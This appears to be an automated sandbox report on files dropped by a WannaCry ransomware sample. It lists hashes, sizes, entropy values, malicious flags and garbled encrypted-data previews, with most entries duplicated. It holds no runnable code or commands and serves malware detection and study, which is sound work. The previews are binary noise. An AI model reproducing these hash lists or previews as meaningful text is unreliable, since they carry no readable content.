                                                                                      SSDEEP:768:fv6mu8jSmE2NRagYNbsbrEf6RDS5k60FOGg3EPJaMWUq9e+nUnL/gRtxrrHX:fi4jhbagYNbsHy6RDSa6nGHarUaPnE/y
                                                                                      MD5:9035141719AA8B049228998D3341B40E
                                                                                      SHA1:1967A4AEA057002D0C3444C48A4052DB3DECE354
                                                                                      SHA-256:16A0BE0F763F683B52CA869B9C40C63BF3B1FDA847DBDA0E0D8C9A301F656418
                                                                                      SHA-512:6D23A31999D029E9E88B1750772A3176E5CAE1DA23FEF22561E95AE9C9FF110C92EBE3C5D001F63FF5896CA44452B5D41FEA7DA0A644796F59CBF5A6F2BC2BCE
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!..........*0..W/.!..JO.r..{..W_.^.vu..i......8....Y...s.J.[.i<...$.r.../L.,L.bO..T.J?.<Q......9......lpd.....'..t....e,...sl.hnS....!j/&SLa.j^.a.a..j!...H.r..~..7s.p8.M.V-...HA.p...]..z...1.A.+[..{s......:.dh...].......h....2:L..Y..e1..|l.C.G................zR..?..9..?t.heq`...tX..../.>%..!.8...t>B....j.f....:a_o......>........l.. p*.h..&.M6..p"<)MF.@m..yo.0G.:.At...Y..4..XL.1.H%..7Lr.u.|.....?..y..8....G..Y..Uc.......mp...>.....^.......>..9..gk........xur..{%h..?.u.k..=..v;AMV.(.p..1W...E...q.......e..,....T[...D?..wv.......n.j.G....[.@g.%.8.6.zc...W91.k......'.j..2....B.../.YU.x+k{U.!*..|...vCe...e~.N..]....HFz...=.t.......L..\s..8...~.oK...k.P.i~)...Y6!...6.....E...2....s....%.I.}.XA-.G`...~.a...Vw.....2../."b.}qn....... [%.4v*..%..Z.Bp..-m. .1.UFu'.RjH...4..e^=...%Ge.8.b.N.....}.....$s...;...[...k..f.u.3|y6.c.n.+.k....d.....D+....,G..>..x.v<.......q.}.ol.J#..f......(.w.O....Cd..2M.*...f..H.....r.6o..V<z.....^.....jjn)lb.hl.l..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):46296
                                                                                      Entropy (8bit):7.995750752352893
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:fv6mu8jSmE2NRagYNbsbrEf6RDS5k60FOGg3EPJaMWUq9e+nUnL/gRtxrrHX:fi4jhbagYNbsHy6RDSa6nGHarUaPnE/y
                                                                                      MD5:9035141719AA8B049228998D3341B40E
                                                                                      SHA1:1967A4AEA057002D0C3444C48A4052DB3DECE354
                                                                                      SHA-256:16A0BE0F763F683B52CA869B9C40C63BF3B1FDA847DBDA0E0D8C9A301F656418
                                                                                      SHA-512:6D23A31999D029E9E88B1750772A3176E5CAE1DA23FEF22561E95AE9C9FF110C92EBE3C5D001F63FF5896CA44452B5D41FEA7DA0A644796F59CBF5A6F2BC2BCE
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!..........*0..W/.!..JO.r..{..W_.^.vu..i......8....Y...s.J.[.i<...$.r.../L.,L.bO..T.J?.<Q......9......lpd.....'..t....e,...sl.hnS....!j/&SLa.j^.a.a..j!...H.r..~..7s.p8.M.V-...HA.p...]..z...1.A.+[..{s......:.dh...].......h....2:L..Y..e1..|l.C.G................zR..?..9..?t.heq`...tX..../.>%..!.8...t>B....j.f....:a_o......>........l.. p*.h..&.M6..p"<)MF.@m..yo.0G.:.At...Y..4..XL.1.H%..7Lr.u.|.....?..y..8....G..Y..Uc.......mp...>.....^.......>..9..gk........xur..{%h..?.u.k..=..v;AMV.(.p..1W...E...q.......e..,....T[...D?..wv.......n.j.G....[.@g.%.8.6.zc...W91.k......'.j..2....B.../.YU.x+k{U.!*..|...vCe...e~.N..]....HFz...=.t.......L..\s..8...~.oK...k.P.i~)...Y6!...6.....E...2....s....%.I.}.XA-.G`...~.a...Vw.....2../."b.}qn....... [%.4v*..%..Z.Bp..-m. .1.UFu'.RjH...4..e^=...%Ge.8.b.N.....}.....$s...;...[...k..f.u.3|y6.c.n.+.k....d.....D+....,G..>..x.v<.......q.}.ol.J#..f......(.w.O....Cd..2M.*...f..H.....r.6o..V<z.....^.....jjn)lb.hl.l..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):53480
                                                                                      Entropy (8bit):7.996153163686191
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:yk4is20QQnRHUK9mkv73znfADnh51EGMSFNM3iVgvrBO:yIsBNnRHUK9Tv77fALyGMAM3sgrI
                                                                                      MD5:5ACA80B2A545434F2B2D45E1E0322D34
                                                                                      SHA1:C3075448F7E8D4D7D74930914CC7EC60FAFE10A9
                                                                                      SHA-256:92FF2961B3DCE7C9C91E5470D3E55560360599612034CBF54F92573ABB43FBD4
                                                                                      SHA-512:640D8C77B2CB490C6BEF20B94312278C756F702854E259CE275684A84D8CD72DF18E01C321FCB1385E2AAF4FB74C4B7BD5E352EA27294EC5506F7FC1471FBBF1
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......9.&..J...$..U.t\7.~....di......y....~.)Ms.:....7..z.z..7.|.....tK\g..,s..u.v.g({.h....{J>{..?J:.-el3"".J.\`...vm..!....\...i.^... !.?..|D...Ac.o.=K.......W7.-..yF.W.9....Oi..G..Ua..5.._.>~.`j.~H..}00=.h.6E.....[.9..Q$-6...C....\.FQ0...3..w.,.............rb.>/tb....a....E.|Ag.Nt....'f..hO.4..}.......P..D.$W83...^39.P.M+....JZ...F..gq.3..l3..\.z..S.S..'8>i.ZBp+9..HWS... V%.KR7.....~j..k....j....N.WJ.aams...#..+...`I.M..3.R.......7.q..bs..0........m.^.dl..K=9_.EaJ..0..'...(.1"G:.<..=..D........5...V.W....;.%.....)..A...rj....L1.MO.....q.[z4...>.P..4.a....`...4...!.;._KZb..j.u.6D.>...W.e.oJ..i..R7..0..)..~..o7..:v~:.....A~.t.iH.o,.t..{].v...`1..hkj..ER...*(...&./r#..Y.V..................(G?..'f.&........J.9.....s.c.4]n.?...S...%..G.|.SFw#M1#w.....{~..U.Q~..1..H..r..q..Y... ..h.~.._..@.t..6.I.G?..E.I.....d..3jW.BaR0...*.rbj.NHy..?...F0..s.!.M.q.........!..\x.AJO....5,w..Fi........h.uH...-5.r.0..~.pAc...j..d8.....s.....L
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):53480
                                                                                      Entropy (8bit):7.996153163686191
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:yk4is20QQnRHUK9mkv73znfADnh51EGMSFNM3iVgvrBO:yIsBNnRHUK9Tv77fALyGMAM3sgrI
                                                                                      MD5:5ACA80B2A545434F2B2D45E1E0322D34
                                                                                      SHA1:C3075448F7E8D4D7D74930914CC7EC60FAFE10A9
                                                                                      SHA-256:92FF2961B3DCE7C9C91E5470D3E55560360599612034CBF54F92573ABB43FBD4
                                                                                      SHA-512:640D8C77B2CB490C6BEF20B94312278C756F702854E259CE275684A84D8CD72DF18E01C321FCB1385E2AAF4FB74C4B7BD5E352EA27294EC5506F7FC1471FBBF1
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......9.&..J...$..U.t\7.~....di......y....~.)Ms.:....7..z.z..7.|.....tK\g..,s..u.v.g({.h....{J>{..?J:.-el3"".J.\`...vm..!....\...i.^... !.?..|D...Ac.o.=K.......W7.-..yF.W.9....Oi..G..Ua..5.._.>~.`j.~H..}00=.h.6E.....[.9..Q$-6...C....\.FQ0...3..w.,.............rb.>/tb....a....E.|Ag.Nt....'f..hO.4..}.......P..D.$W83...^39.P.M+....JZ...F..gq.3..l3..\.z..S.S..'8>i.ZBp+9..HWS... V%.KR7.....~j..k....j....N.WJ.aams...#..+...`I.M..3.R.......7.q..bs..0........m.^.dl..K=9_.EaJ..0..'...(.1"G:.<..=..D........5...V.W....;.%.....)..A...rj....L1.MO.....q.[z4...>.P..4.a....`...4...!.;._KZb..j.u.6D.>...W.e.oJ..i..R7..0..)..~..o7..:v~:.....A~.t.iH.o,.t..{].v...`1..hkj..ER...*(...&./r#..Y.V..................(G?..'f.&........J.9.....s.c.4]n.?...S...%..G.|.SFw#M1#w.....{~..U.Q~..1..H..r..q..Y... ..h.~.._..@.t..6.I.G?..E.I.....d..3jW.BaR0...*.rbj.NHy..?...F0..s.!.M.q.........!..\x.AJO....5,w..Fi........h.uH...-5.r.0..~.pAc...j..d8.....s.....L
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):18856
                                                                                      Entropy (8bit):7.990337816633614
                                                                                      Encrypted:true
                                                                                      SSDEEP:384:/En9VWM7h+Q5XNlcZXVhwSRDHx28y7zGG94TC5MRqDyzDC:/E9RxcOSVHxDQtMEDyHC
                                                                                      MD5:378E711305873371F50CA388881EB996
                                                                                      SHA1:B2C667FA228DE25E10A3DF25443DBB993CFA9CE2
                                                                                      SHA-256:55DFEC26B3E61CB3C46F15DA9D237295E15C1F0851715F0CC83DB43A8CFD968F
                                                                                      SHA-512:93285704BDD40E39654E9EED6583F8C1B442A5A5A9D3FF1A8167CF13419C1AD0D32109708D848243B651EC5D970293022021C6004D851ED70CDED85AEA5BF9C6
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!..................%.b4..7y.....v..OZ.....a$2.8.D....q.{.(.N...h1.w=..W..A..J.....AU...<.JS<-..;c.t..t.).X.W.<k!.9.d..k...9...P...+q..J...F.~5....7.Q......w..JXt........7./=..~....c....W...Y......7..4.E.&.:..f.jE.A...0.....I.<...T0fR..Md...I+........H.......`.D-J.h.=RJ^..k.K...>.v.. ..\..D.....P.e>9....`.!..........0a.S$.f5.;G.....r.#....wB.....).e.....<s$...$u2...}...{.<.-...P.{....O...U...9...|1..Y..^..4.V...s..$J.XF^"`....h1F...Q..n$y{...SHncu...UYp9...e...H*4.t.g<;....c....[...`......Le;.../..AF...F..&..........,0X~........l....T..vl...Q..6./7.....C.q...&mJ.Y.`.Dvs..G,..Bt.)9...U..&B..ny.U.7....n/.]E....y.\.H^._..r....w.h."f....aPb.....n.1..}.6O.]..P.2*U...'....V.h>..zC5..q.......~...#........]W(...S..F...R6. .U.....5.......50&....j...!CZ....a.I..@..]=.^8t%..${.cP....\...%O...`>...72..S..]...opsADt..h..i.`..}y.X..[..7...2..f........k.._.W..b."...H...o.9..5..V.`4,..@..F....Sv.....{p...H4... tI..g...3.-..f..Ol .t..4..U.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):18856
                                                                                      Entropy (8bit):7.990337816633614
                                                                                      Encrypted:true
                                                                                      SSDEEP:384:/En9VWM7h+Q5XNlcZXVhwSRDHx28y7zGG94TC5MRqDyzDC:/E9RxcOSVHxDQtMEDyHC
                                                                                      MD5:378E711305873371F50CA388881EB996
                                                                                      SHA1:B2C667FA228DE25E10A3DF25443DBB993CFA9CE2
                                                                                      SHA-256:55DFEC26B3E61CB3C46F15DA9D237295E15C1F0851715F0CC83DB43A8CFD968F
                                                                                      SHA-512:93285704BDD40E39654E9EED6583F8C1B442A5A5A9D3FF1A8167CF13419C1AD0D32109708D848243B651EC5D970293022021C6004D851ED70CDED85AEA5BF9C6
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!..................%.b4..7y.....v..OZ.....a$2.8.D....q.{.(.N...h1.w=..W..A..J.....AU...<.JS<-..;c.t..t.).X.W.<k!.9.d..k...9...P...+q..J...F.~5....7.Q......w..JXt........7./=..~....c....W...Y......7..4.E.&.:..f.jE.A...0.....I.<...T0fR..Md...I+........H.......`.D-J.h.=RJ^..k.K...>.v.. ..\..D.....P.e>9....`.!..........0a.S$.f5.;G.....r.#....wB.....).e.....<s$...$u2...}...{.<.-...P.{....O...U...9...|1..Y..^..4.V...s..$J.XF^"`....h1F...Q..n$y{...SHncu...UYp9...e...H*4.t.g<;....c....[...`......Le;.../..AF...F..&..........,0X~........l....T..vl...Q..6./7.....C.q...&mJ.Y.`.Dvs..G,..Bt.)9...U..&B..ny.U.7....n/.]E....y.\.H^._..r....w.h."f....aPb.....n.1..}.6O.]..P.2*U...'....V.h>..zC5..q.......~...#........]W(...S..F...R6. .U.....5.......50&....j...!CZ....a.I..@..]=.^8t%..${.cP....\...%O...`>...72..S..]...opsADt..h..i.`..}y.X..[..7...2..f........k.._.W..b."...H...o.9..5..V.`4,..@..F....Sv.....{p...H4... tI..g...3.-..f..Ol .t..4..U.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1573144
                                                                                      Entropy (8bit):7.999878305955967
                                                                                      Encrypted:true
                                                                                      SSDEEP:24576:c6fYgQ0gFtKnCxgEwpQMVNE/oUyqUTPhHaKFM4rVD4hLv4pZ/+5C5wvPT8I:zfZQ0gqCNMVNBqsP1aqrx4wpZTMPTR
                                                                                      MD5:47DB50E51E28690266D64EA5D54B0705
                                                                                      SHA1:94BF21473E257E64A32128F82DDAE7C6EE40B3B2
                                                                                      SHA-256:EC4548C1EF48A0C1DE9FD55CAC835DAF9FC09642CCFBD02D7B5FB01858AD5DA1
                                                                                      SHA-512:E33D267758FE67E99F6B74FF967D53FD9A149CD8FEEF6AE98F1424C25CFE8C7F017CE045A5CF34EAEC3FE3528EACC64629374E88CB21BCB1F701C7D42ED3AA1A
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......F...b..s.ri.c..',.G...,d......SF\..%..z6....VS..DE......-...v.i..0.^r=h<P].+H..{....s.=... S|..c.... .......^..`..n.6y...Htsm.!.#..EK..1...Q....GI.y.*xX.HN..7..]S;SY.\J.Y!A.a.`..>._.F...*..1.~....lAR.7s.E..lW..iW...2..~<... .Q.>.X...w...^.....>1 ....................G.I.p`.&..n59k.(=.....1.".X..L.A..1T.X.C}.Q..........Y.....wD..X9.q+....-..Y.x)H.."E...O(.9.U.......:.2.rV...>..."...w....!......B...Rb...g.&{R..I.y..j..4nK..V..1.-'E:_d..2.f..t.....J....O^...[<.Ua..zC.z.1...J.8.L.m..^..1Hyv(.;b.I..=S.7.....C.b.i..A......z..wN..3..U..E!...._.i,..y.db...^..N.\*..s.M.n.Z.o_*...8...W.<^7...R.M....H...\}.L#.8s.=..d....L....6..).I..0...F..yX..(6,@......M.)....^:T..0..".y>I.!G.....&X&........3i.DL.......|......;b...&...a....M..d.3.#...nj.|Tz.1L...e.j"2q.OQ..-..M.W....@....2.u..]........1}^3DI...M..gM.O.6{...K......by....2.q}....`......d....z..2..7U.........i.@..j....(....(.U<L.6.G.=c..E.P....>....we.}..6NA+...&......*..6O.....?....{.>@...l.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1573144
                                                                                      Entropy (8bit):7.999878305955967
                                                                                      Encrypted:true
                                                                                      SSDEEP:24576:c6fYgQ0gFtKnCxgEwpQMVNE/oUyqUTPhHaKFM4rVD4hLv4pZ/+5C5wvPT8I:zfZQ0gqCNMVNBqsP1aqrx4wpZTMPTR
                                                                                      MD5:47DB50E51E28690266D64EA5D54B0705
                                                                                      SHA1:94BF21473E257E64A32128F82DDAE7C6EE40B3B2
                                                                                      SHA-256:EC4548C1EF48A0C1DE9FD55CAC835DAF9FC09642CCFBD02D7B5FB01858AD5DA1
                                                                                      SHA-512:E33D267758FE67E99F6B74FF967D53FD9A149CD8FEEF6AE98F1424C25CFE8C7F017CE045A5CF34EAEC3FE3528EACC64629374E88CB21BCB1F701C7D42ED3AA1A
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......F...b..s.ri.c..',.G...,d......SF\..%..z6....VS..DE......-...v.i..0.^r=h<P].+H..{....s.=... S|..c.... .......^..`..n.6y...Htsm.!.#..EK..1...Q....GI.y.*xX.HN..7..]S;SY.\J.Y!A.a.`..>._.F...*..1.~....lAR.7s.E..lW..iW...2..~<... .Q.>.X...w...^.....>1 ....................G.I.p`.&..n59k.(=.....1.".X..L.A..1T.X.C}.Q..........Y.....wD..X9.q+....-..Y.x)H.."E...O(.9.U.......:.2.rV...>..."...w....!......B...Rb...g.&{R..I.y..j..4nK..V..1.-'E:_d..2.f..t.....J....O^...[<.Ua..zC.z.1...J.8.L.m..^..1Hyv(.;b.I..=S.7.....C.b.i..A......z..wN..3..U..E!...._.i,..y.db...^..N.\*..s.M.n.Z.o_*...8...W.<^7...R.M....H...\}.L#.8s.=..d....L....6..).I..0...F..yX..(6,@......M.)....^:T..0..".y>I.!G.....&X&........3i.DL.......|......;b...&...a....M..d.3.#...nj.|Tz.1L...e.j"2q.OQ..-..M.W....@....2.u..]........1}^3DI...M..gM.O.6{...K......by....2.q}....`......d....z..2..7U.........i.@..j....(....(.U<L.6.G.=c..E.P....>....we.}..6NA+...&......*..6O.....?....{.>@...l.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1573144
                                                                                      Entropy (8bit):7.99987403369621
                                                                                      Encrypted:true
                                                                                      SSDEEP:24576:P2D9SlJYMxOV9ZbLxh79rSPwysUiD4tobnGZJIk2Az4RPj38suNhWYpWl:PESoMYxh7FYwbHLGZJRb4R4I4q
                                                                                      MD5:F234E03A341E1B2368ADC5C75AFF0171
                                                                                      SHA1:4EC829EA14776644AD8563AC6FF948E9483E6436
                                                                                      SHA-256:6BD82DE7B07DC8171FB2AA7D20C39F36255EDCB27A7C4D90327EB9C776E5A7CF
                                                                                      SHA-512:43D7EE183566A38701826FD9AD21B7F192C30489A0AB7E3900BE30EA02A995CC6F60FC20A4DB09AC66CEFAC0341DC7F3AB9DBCDEC4360DBD0BF3DD0B4DB734D3
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....8"(S#.^..e..To0.t.x..t..h........iybA.%.9......I&.I.0R........'....7l....q;....L.B7......z.......X.M.c.>...p'.6sA..DP.*...._.nd...x....I.c.Z.n..[.Pb.T....`.;2}'z........8..g...e...P....*........x.n.......Q...`.Q.....p.P+m....}"F..1.....|Se.....k..............F..6...C.:.t&....X...}.....):...G.<.o..9h.'....6c....._..;..'.b..7a#Y.sM .}.n._?..P.....#T....H....5.%.%.T.U..`....c.t.j.*.q.f..!.......Q..]4t..0.Y..h.s .a......M..H...n.......?sF=.n....`q.E.!...8.,.p..D(.d5=b..J/,..A-..F.H..,.?..G@.h..p"....(..-.`(..K..#G..&a..W.lk.u.V...$...Q...a...Et......N8..a...v..M.?%|....,.....4.?w.C.5f..&....c..E......&O...1....@'.p.c..&....n..CK...f.b.p.2.....W...JQ.....Q.....[......!/j.w.!.'....'..S`..p?'.K..w.W.tx..%.V..w......<w.7iO....U.a'....W>.Q,......>..w...m.'.7P4.`..'.../._....k.`$u"../........S.4-.....p.)!2......W|...0.x.6).I..=l...$..V.<K..P.e..G3.3..S...x...&H.q0...o1]..,..k....E..~.T...qu..p.....pC...-...?6.D.[.V..~.u`..1F}.z.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1573144
                                                                                      Entropy (8bit):7.99987403369621
                                                                                      Encrypted:true
                                                                                      SSDEEP:24576:P2D9SlJYMxOV9ZbLxh79rSPwysUiD4tobnGZJIk2Az4RPj38suNhWYpWl:PESoMYxh7FYwbHLGZJRb4R4I4q
                                                                                      MD5:F234E03A341E1B2368ADC5C75AFF0171
                                                                                      SHA1:4EC829EA14776644AD8563AC6FF948E9483E6436
                                                                                      SHA-256:6BD82DE7B07DC8171FB2AA7D20C39F36255EDCB27A7C4D90327EB9C776E5A7CF
                                                                                      SHA-512:43D7EE183566A38701826FD9AD21B7F192C30489A0AB7E3900BE30EA02A995CC6F60FC20A4DB09AC66CEFAC0341DC7F3AB9DBCDEC4360DBD0BF3DD0B4DB734D3
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....8"(S#.^..e..To0.t.x..t..h........iybA.%.9......I&.I.0R........'....7l....q;....L.B7......z.......X.M.c.>...p'.6sA..DP.*...._.nd...x....I.c.Z.n..[.Pb.T....`.;2}'z........8..g...e...P....*........x.n.......Q...`.Q.....p.P+m....}"F..1.....|Se.....k..............F..6...C.:.t&....X...}.....):...G.<.o..9h.'....6c....._..;..'.b..7a#Y.sM .}.n._?..P.....#T....H....5.%.%.T.U..`....c.t.j.*.q.f..!.......Q..]4t..0.Y..h.s .a......M..H...n.......?sF=.n....`q.E.!...8.,.p..D(.d5=b..J/,..A-..F.H..,.?..G@.h..p"....(..-.`(..K..#G..&a..W.lk.u.V...$...Q...a...Et......N8..a...v..M.?%|....,.....4.?w.C.5f..&....c..E......&O...1....@'.p.c..&....n..CK...f.b.p.2.....W...JQ.....Q.....[......!/j.w.!.'....'..S`..p?'.K..w.W.tx..%.V..w......<w.7iO....U.a'....W>.Q,......>..w...m.'.7P4.`..'.../._....k.`$u"../........S.4-.....p.)!2......W|...0.x.6).I..=l...$..V.<K..P.e..G3.3..S...x...&H.q0...o1]..,..k....E..~.T...qu..p.....pC...-...?6.D.[.V..~.u`..1F}.z.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):126360
                                                                                      Entropy (8bit):7.998709402602684
                                                                                      Encrypted:true
                                                                                      SSDEEP:3072:bQtBCR3cxsdVekv6mSJQXK67OV+Q1uz7jF1X:UYxcGdVBv/SqagQYhl
                                                                                      MD5:64C356FB4925F016D146B26126530856
                                                                                      SHA1:787C3D27AA93611C35D1D4ACBA568BB3AD0D92C2
                                                                                      SHA-256:614C62603DB57DA1A96C8E8590412EB352F8CDBEED972E6F9D8D3595F7F70877
                                                                                      SHA-512:DAC3F944140233A213A6401B6CAF54B0A74B6B32009B2EA3F91490B8574D1598D2C95C808F76557DCD9C509FA4F6BC20ED86F80A16D74E250A4C2E60498450DD
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....=]...@D..g..Y..|iS....!|o5..-M.g..../.].......2..E.......n..F.....v..V....e..Y..<...v.m.#.W..umn2.C..C...............&..p.. ..i...C$...6.E\....A.yT~.l..`.....QX..M$)....]....`....K...;{n.8R{.(.:p...5.+...z....h@.|.$F.e..=...pI6........>uGLC....S............DE.`...n.,.+...35.WUNp...U...1Ml.|.Vbei&.X..*.%..4|...[..AB..f^.j....3........a...?*..XL.J.:..W..s.@...i'...6.....J..Tt...?....=q...[....5w.#.y"..I.......B.9.#.`.k..._Z...~....$...u..p.r<.FHSWz]E{.^.cS+9...&.e.......R......t......R_.J.....hxM)..^....,..9o..~^.>..A.`...U.....Ok......-....KK.v`...2t.2..T1....G.v.a}.Gr.,3.~.[A..H7;fn....'..e...h.....tlg`.t.......|..x.s.V.:.MN....<k..+(.&R.w..i.... (.#........%..3......^.=./...,...(.P....T......0...QL-.2..wJY.7.U.u.t.u5CoZ..F...D\.*...p...).]..\. "1..:.........~.....G4.jmlZ..0.H.l...*E6.'.^KeOS..../]'O..#c.kKDi...E]\.8!...b.9...*%=,.;*..K@...O.^.J.\.o...`...c....I#{3..h...K...6.b..~.....2...0Q...0.j.a..R0....$....T...-?..R.....JB.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):126360
                                                                                      Entropy (8bit):7.998709402602684
                                                                                      Encrypted:true
                                                                                      SSDEEP:3072:bQtBCR3cxsdVekv6mSJQXK67OV+Q1uz7jF1X:UYxcGdVBv/SqagQYhl
                                                                                      MD5:64C356FB4925F016D146B26126530856
                                                                                      SHA1:787C3D27AA93611C35D1D4ACBA568BB3AD0D92C2
                                                                                      SHA-256:614C62603DB57DA1A96C8E8590412EB352F8CDBEED972E6F9D8D3595F7F70877
                                                                                      SHA-512:DAC3F944140233A213A6401B6CAF54B0A74B6B32009B2EA3F91490B8574D1598D2C95C808F76557DCD9C509FA4F6BC20ED86F80A16D74E250A4C2E60498450DD
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....=]...@D..g..Y..|iS....!|o5..-M.g..../.].......2..E.......n..F.....v..V....e..Y..<...v.m.#.W..umn2.C..C...............&..p.. ..i...C$...6.E\....A.yT~.l..`.....QX..M$)....]....`....K...;{n.8R{.(.:p...5.+...z....h@.|.$F.e..=...pI6........>uGLC....S............DE.`...n.,.+...35.WUNp...U...1Ml.|.Vbei&.X..*.%..4|...[..AB..f^.j....3........a...?*..XL.J.:..W..s.@...i'...6.....J..Tt...?....=q...[....5w.#.y"..I.......B.9.#.`.k..._Z...~....$...u..p.r<.FHSWz]E{.^.cS+9...&.e.......R......t......R_.J.....hxM)..^....,..9o..~^.>..A.`...U.....Ok......-....KK.v`...2t.2..T1....G.v.a}.Gr.,3.~.[A..H7;fn....'..e...h.....tlg`.t.......|..x.s.V.:.MN....<k..+(.&R.w..i.... (.#........%..3......^.=./...,...(.P....T......0...QL-.2..wJY.7.U.u.t.u5CoZ..F...D\.*...p...).]..\. "1..:.........~.....G4.jmlZ..0.H.l...*E6.'.^KeOS..../]'O..#c.kKDi...E]\.8!...b.9...*%=,.;*..K@...O.^.J.\.o...`...c....I#{3..h...K...6.b..~.....2...0Q...0.j.a..R0....$....T...-?..R.....JB.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):15224
                                                                                      Entropy (8bit):7.986328829222186
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:xe0UTpGmh2264OxXBJr9AUEopbJvETCN9JYCpyPIvn9MQi:xeVTAmhAxjr9AU/pVEWCCpr/3i
                                                                                      MD5:32036B1A42B2592DC389DA234F78D0F1
                                                                                      SHA1:EB4740B326F9B88CEC28300A80E237AFF1A9C05B
                                                                                      SHA-256:2F31FFAE961394F59EF02A250A95B652A30083D9BC1F6E43FE84F6B87597FE79
                                                                                      SHA-512:07C529A2F1959E9ACCD1418DF6023D2C2EF39D8EDC344AB73056F61F4619D95A64C305E55C76293FC232203C63289121EA7C42D3A1C2BE82370284F55C992630
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....r...g..B.y0I..S.o...5........vy.{YO.+..l7pW..1...y....J....J|5.Q...9.pQ/J..s...N@...T.glF...q..2..'..k.~.nf..p.dc..?....r.Y.].]...4..C.yD.-....V: ..=ZBjw.Y.9..*K....1.......=.((.v....RD..lB....n...c.,.. .is.u....O.%.NmF.....r.zX......dy...7.s@`....Q:.........p.. ....kEC.q.l..T&.#.t.......q.a..k@.....>..X;ua..n..(..^.J..........I.....H\baZg...L.e..]....S..>.$.#....^U....s.CU..X.?.......R...V.....U..(.....^.c..e2..e.o....=.!.I3....&......v..;s...dsT@......r<.&W......(`x.P....(5....q.b...KG....Z.%.3...c.ieK*)..\v.......'.-...a.@~...R.1.*..V.R....`.p..g.],>M#...i....i...gC....7.].qv.=.B.*.2.&...J.a&....a..f@..rr..(.}..J!..ek.0pG?4.\....Dh...:FvG..@..^...-.u....c%>f..2..Q.k..(.X.C.4......?{~.k.`.)O.)/.1....S.Dli.F.IN..q...7O4)o...b....B..Ko2.]:.@.....J.29.o,Qj..j..Q{tc-U.;.5.....c..?...~...?.#|...K#......Nu.........J0A.........36..kzGA3.1...9..z....Dqj.D......l..:..y.WA 0...M...4..stU....[=n..@.. ......J....|R........R.4
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):15224
                                                                                      Entropy (8bit):7.986328829222186
                                                                                      Encrypted:false
